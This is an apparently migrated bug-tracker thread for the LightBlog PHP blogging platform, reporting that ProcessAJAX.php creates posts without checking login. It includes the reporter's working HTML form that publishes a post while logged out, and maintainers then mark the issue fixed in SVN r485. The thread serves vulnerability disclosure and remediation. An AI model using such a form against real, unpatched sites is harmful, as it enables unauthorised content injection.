search

soren121 / lightblog

PHP/SQLite blogging platform
GNU General Public License v3.0
2 stars 0 forks source link

Posting posts without being logged in. #18

Closed soren121 closed 9 years ago

soren121 commented 9 years ago

From joeyvanh...@gmail.com on May 31, 2010 05:40:47

What steps will reproduce the problem? 1. Log in

  1. create post & log out
  2. Submit the post What is the expected output? What do you see instead? A security measurement should stop you from being able to post when logged out. However the ajax processor seems to simply create the post even when you're logged out. What version of the product are you using? On what operating system? 0.9.3 beta 1 If any, please paste the errors given below.

Original issue: http://code.google.com/p/lightblog/issues/detail?id=18

soren121 commented 9 years ago

From joeyvanh...@gmail.com on May 31, 2010 10:59:13

<form action="http://127.0.0.1/LightBlog/Sources/ProcessAJAX.php method="post" id="haxorz">                                         <p><input name="create" value="1" type="text" id="create" />                                         <label for="create"><small>create</small></label></p>                                         <p><input name="type" value="post" type="text" id="type" />                                         <label for="type"><small>type</small></label></p>                                         <p><input name="title" value="title" type="text" id="title" />                                         <label for="title"><small>title</small></label></p>                                         <p><input name="text" value="blahblah testhackzors" type="text" id="text" />                                         <label for="text"><small>text</small></label></p>                                         <p><input name="published" value="1" type="text" id="pub" />                                         <label for="pub"><small>published</small></label></p>                                         <p><input name="comments" value="1" type="text" id="com" />                                         <label for="com"><small>comments</small></label></p>                                         <p><input name="hax_submit" type="submit" value="Submit" id="haxsubmit" /></p>                                 </form>

This HTML can create a post for everyone logged out.

soren121 commented 9 years ago

From doodle62 on May 31, 2010 13:04:40

(No comment was entered for this change.)

Status: Accepted
Labels: -Priority-Medium Priority-Critical

soren121 commented 9 years ago

From doodle62 on May 31, 2010 13:06:28

(No comment was entered for this change.)

Labels: Milestone-0.9.3

soren121 commented 9 years ago

From doodle62 on May 31, 2010 18:11:31

The post creation routines have been secured, still working on the editing routines...

Status: Started

soren121 commented 9 years ago

From doodle62 on June 03, 2010 09:48:02

Fixed in SVN r485 .

Status: Fixed